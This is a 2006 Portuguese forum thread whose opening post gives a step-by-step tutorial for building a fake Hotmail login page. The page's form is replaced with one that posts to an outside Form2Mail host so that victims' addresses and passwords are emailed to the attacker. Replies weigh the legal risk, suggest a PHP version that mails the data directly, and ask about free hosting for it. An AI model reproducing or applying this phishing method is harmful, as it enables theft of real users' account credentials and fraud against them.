Pegando senhas hotmail, por página alterada

Started by Anonymous, 20 de May , 2006, 02:34:19 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

Vá no site de login da hotmail

Logo em seguida vá em Arquivo, e Salvar Como (Ou Ctrl+S), e escolha um lugar onde você queira por a página pra aperfeiçoá-la. Pronto, a página original está no seu HD pronta pra sofrer as mudanças.

Abra o arquivo uilogin.srf.htm (O da foto acima) com o bloco de notas.

Logo em seguida, selecione tudo que tiver entre a tag form... no caso, tudo que tiver entre . Faça como segue a Figura:

Agora é a hora de editar. Vamos por parte... Substitua a parte que está selecionada por essa, e logo em seguida salve.

http://free4web.pl/Form2Mail/">
Entrar em Hotmailseunome@exemplo.com.br. Esqueceu sua senha?

Símbolo da Microsoft Passport Network

Serviços de Contas | Termos de Uso
© 2005 Microsoft Corporation. Todos os direitos reservados.

Ficando assim:

Pronto, está feito faça um teste, se logue e logo verão que chegou um email na sua caixa de entrada com o login da pessoa e a senha... o email aparecerá assim:

Informações: mailto:email@hotmail.com">email@hotmail.com
Senha: senha

Obs: Todos os direitos reservados, caso queira por no seu site ou divulgar de qualquer outra forma, entre em contato comigo (quick).

PS2: O uso indevido desse tutorial não é problema meu, eu pus como fonte de estudo e forma de adicionar mais conhecimento a pessoa que tiver interessado. Agora caso queira utilizar de outra forma é problema seu.

PS3: A página que eu indiquei é somente para exemplificar o processo e que realmente funciona, caso se loguem lá irá senha pra um email que eu nao tenho controle.

Autor: Quick
Fonte: Forum Invasao

100 +

Nêmesis

rog

isso sem esquecer que tem um texto na pagina que pode dar bolo mesmo

Quote2005 Microsoft Corporation. Todos os direitos reservados.

se tever algum advogado/estudante em direito/ nos membres que poderia dizer o que arrisca um cara que coloca online um scam desse na hora que for pego, seria interessante

rog

nunca esquecendo que illwill esta preso (2 anos) por ter vendido uma copia do codigo fonte do win2000 por 40$ que ele mesmo baixou na net
realty.sys is corrupt :  reboot the universe (Y/N)

Reeves

é rog

hoje em dia, tão prendendo todo mundo como se foce bandido qualquer..
ta foda

:-\
  °vº   NÃO USE DROGAS,
/(_)\  USE GNU/LINUX
^ ^

rog

e por isso que tem que avisar bem a turma sobre as consequenças

o illwill nao e um noob, ele e famoso no underground estrangeiro, entrou em cana em março e so vai sair daqui ha dois anos por causa de 40$

depois disso ele so podera usar computador monitorado pela justiça durante 3 anos

tem que ficar esperto mesmo

rog
realty.sys is corrupt :  reboot the universe (Y/N)

HadeS

Realmente, a coisa tá feia pro nosso lado, mas bandido de verdade tá por aí, solto, a vontade.

Mas voltando ao assunto do tópico. É até interessante o método, mas uma página em PHP que mande diretamente prum e-mail qualquer as informações seria mais útil.

HadeS

Anonymous

vcs poderiam tira uma duvida e isso seria so hospedado em php em html nao funciona? e se for so e php tm algum local free para hostadar php
fikaria grato se me ajudasse
grato pela atençao